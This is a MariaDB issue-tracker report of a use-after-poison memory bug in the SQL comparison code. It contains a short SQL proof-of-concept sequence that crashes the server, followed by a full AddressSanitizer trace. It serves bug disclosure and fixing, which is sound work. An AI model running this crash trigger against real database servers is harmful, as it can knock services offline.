MariaDB Server / MDEV-26408

use-after-poison security in sql/item_cmpfunc.h


    Details

    • Type: Bug
    • Status: Closed
    • Priority: Major
    • Resolution: Duplicate
    • Affects Version/s: 10.7
    • Fix Version/s: N/A
    • Labels:
      None
    • Environment:
      Linux version 5.13.0-1-MANJARO (builduser@LEGION) (gcc (GCC) 11.1.0, GNU ld (GNU Binutils) 2.36.1) #1 SMP PREEMPT Mon Jun 7 06:16:10 UTC 2021 x86_64

      Description

      PoC:

      CREATE TEMPORARY TABLE v0 ( v1 CHAR , NEW INT AS ( CASE 'x' WHEN v1 = 'x' THEN v1 ELSE 'x' = FROM_UNIXTIME ( 2147483647 ) END ) ) ;
      UPDATE v0 SET v1 = 0 , v1 = 95 WHERE v1 = 5 AND v1 = -1 ;
      SELECT length ( least ( 'x' 'x' 'x' 'x' ^ 0 + 'x' ^ 79070223.000000 + 93 ^ 25145487.000000 + -128 ^ 72176287.000000 , 'x' ) ) FROM DUAL ;
      DELETE FROM v0 WHERE ( v1 , v1 ) IN ( ( 8 , 'x' ) , ( 45 , 'x' ) ) ORDER BY v1 , v1 LIMIT 15 ;
      SET GLOBAL READ_ONLY = YEAR ( str_to_date ( 'x' , NULL ) ) ;
      USE WARNINGS ;
      

      ASan report:

      2021-08-16 14:55:18 0 [Note] InnoDB: Compressed tables use zlib 1.2.11
      2021-08-16 14:55:18 0 [Note] InnoDB: Number of pools: 1
      2021-08-16 14:55:18 0 [Note] InnoDB: Using crc32 + pclmulqdq instructions
      2021-08-16 14:55:18 0 [Note] mysqld: O_TMPFILE is not supported on /tmp (disabling future attempts)
      2021-08-16 14:55:18 0 [Note] InnoDB: Using liburing
      2021-08-16 14:55:18 0 [Note] InnoDB: Initializing buffer pool, total size = 134217728, chunk size = 134217728
      2021-08-16 14:55:18 0 [Note] InnoDB: Completed initialization of buffer pool
      2021-08-16 14:55:28 0 [Note] InnoDB: 128 rollback segments are active.
      2021-08-16 14:55:28 0 [Note] InnoDB: Creating shared tablespace for temporary tables
      2021-08-16 14:55:28 0 [Note] InnoDB: Setting file './ibtmp1' size to 12 MB. Physically writing the file full; Please wait ...
      2021-08-16 14:55:28 0 [Note] InnoDB: File './ibtmp1' size is now 12 MB.
      2021-08-16 14:55:29 0 [Note] InnoDB: 10.7.0 started; log sequence number 42173; transaction id 14
      2021-08-16 14:55:29 0 [Note] Plugin 'FEEDBACK' is disabled.
      2021-08-16 14:55:29 0 [Note] InnoDB: Loading buffer pool(s) from /home/fuboat/mariadb-tmp/17/ib_buffer_pool
      2021-08-16 14:55:29 0 [Note] Server socket created on IP: '0.0.0.0'.
      2021-08-16 14:55:29 0 [Note] Server socket created on IP: '::'.
      2021-08-16 14:55:29 0 [Note] InnoDB: Buffer pool(s) load completed at 210816 14:55:29
      2021-08-16 14:55:29 0 [Note] /usr/local/mysql/bin//mysqld: ready for connections.
      Version: '10.7.0-MariaDB'  socket: '/tmp/17.socket'  port: 10017  Source distribution
      =================================================================
      ==3376229==ERROR: AddressSanitizer: use-after-poison on address 0x6290000889f8 at pc 0x560b3515065f bp 0x7f31f2db85d0 sp 0x7f31f2db85c0
      READ of size 8 at 0x6290000889f8 thread T13
          #0 0x560b3515065e in Predicant_to_list_comparator::Predicant_to_value_comparator::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2105
          #1 0x560b3515065e in Predicant_to_list_comparator::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2214
          #2 0x560b3515065e in Item_func_case_simple::cleanup() /experiment/mariadb-server/sql/item_cmpfunc.h:2397
          #3 0x560b347a08c3 in Item::delete_self() /experiment/mariadb-server/sql/item.h:2522
          #4 0x560b347a08c3 in Query_arena::free_items() /experiment/mariadb-server/sql/sql_class.cc:3823
          #5 0x560b34bec7d8 in closefrm(TABLE*) /experiment/mariadb-server/sql/table.cc:4434
          #6 0x560b34ec50f4 in THD::close_temporary_table(TABLE*) /experiment/mariadb-server/sql/temporary_tables.cc:1238
          #7 0x560b34ec7464 in THD::close_temporary_tables() /experiment/mariadb-server/sql/temporary_tables.cc:531
          #8 0x560b347a19ef in THD::cleanup() /experiment/mariadb-server/sql/sql_class.cc:1549
          #9 0x560b345a51c4 in unlink_thd(THD*) /experiment/mariadb-server/sql/mysqld.cc:2686
          #10 0x560b34ca494b in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1429
          #11 0x560b34ca533c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
          #12 0x560b35735c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
          #13 0x7f3212044258 in start_thread (/usr/lib/libpthread.so.0+0x9258)
          #14 0x7f3211bef5e2 in __GI___clone (/usr/lib/libc.so.6+0xfe5e2)
       
      0x6290000889f8 is located 6136 bytes inside of 16400-byte region [0x629000087200,0x62900008b210)
      allocated by thread T13 here:
          #0 0x7f32126d6279 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145
          #1 0x560b360689a8 in my_malloc /experiment/mariadb-server/mysys/my_malloc.c:90
          #2 0x560b36054e40 in reset_root_defaults /experiment/mariadb-server/mysys/my_alloc.c:243
          #3 0x560b347961b8 in THD::init_for_queries() /experiment/mariadb-server/sql/sql_class.cc:1405
          #4 0x560b34ca2d51 in prepare_new_connection_state(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1240
          #5 0x560b34ca365f in thd_prepare_connection(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1333
          #6 0x560b34ca365f in thd_prepare_connection(THD*) /experiment/mariadb-server/sql/sql_connect.cc:1322
          #7 0x560b34ca4e0a in do_handle_one_connection(CONNECT*, bool) /experiment/mariadb-server/sql/sql_connect.cc:1408
          #8 0x560b34ca533c in handle_one_connection /experiment/mariadb-server/sql/sql_connect.cc:1312
          #9 0x560b35735c2b in pfs_spawn_thread /experiment/mariadb-server/storage/perfschema/pfs.cc:2201
          #10 0x7f3212044258 in start_thread (/usr/lib/libpthread.so.0+0x9258)
       
      Thread T13 created by T0 here:
          #0 0x7f3212677fa7 in __interceptor_pthread_create /build/gcc/src/gcc/libsanitizer/asan/asan_interceptors.cpp:216
          #1 0x560b35735ea9 in my_thread_create /experiment/mariadb-server/storage/perfschema/my_thread.h:48
          #2 0x560b35735ea9 in pfs_spawn_thread_v1 /experiment/mariadb-server/storage/perfschema/pfs.cc:2252
          #3 0x560b345a6b3c in inline_mysql_thread_create /experiment/mariadb-server/include/mysql/psi/mysql_thread.h:1139
          #4 0x560b345a6b3c in create_thread_to_handle_connection(CONNECT*) /experiment/mariadb-server/sql/mysqld.cc:5934
          #5 0x560b345b27b6 in handle_accepted_socket(st_mysql_socket, st_mysql_socket) /experiment/mariadb-server/sql/mysqld.cc:6055
          #6 0x560b345b336f in handle_connections_sockets() /experiment/mariadb-server/sql/mysqld.cc:6179
          #7 0x560b345b6a52 in mysqld_main(int, char**) /experiment/mariadb-server/sql/mysqld.cc:5829
          #8 0x7f3211b18b24 in __libc_start_main (/usr/lib/libc.so.6+0x27b24)
       
      SUMMARY: AddressSanitizer: use-after-poison /experiment/mariadb-server/sql/item_cmpfunc.h:2105 in Predicant_to_list_comparator::Predicant_to_value_comparator::cleanup()
      ==3376229==ABORTING

        People

        Assignee: Unassigned
        Reporter: Zhiyong Wu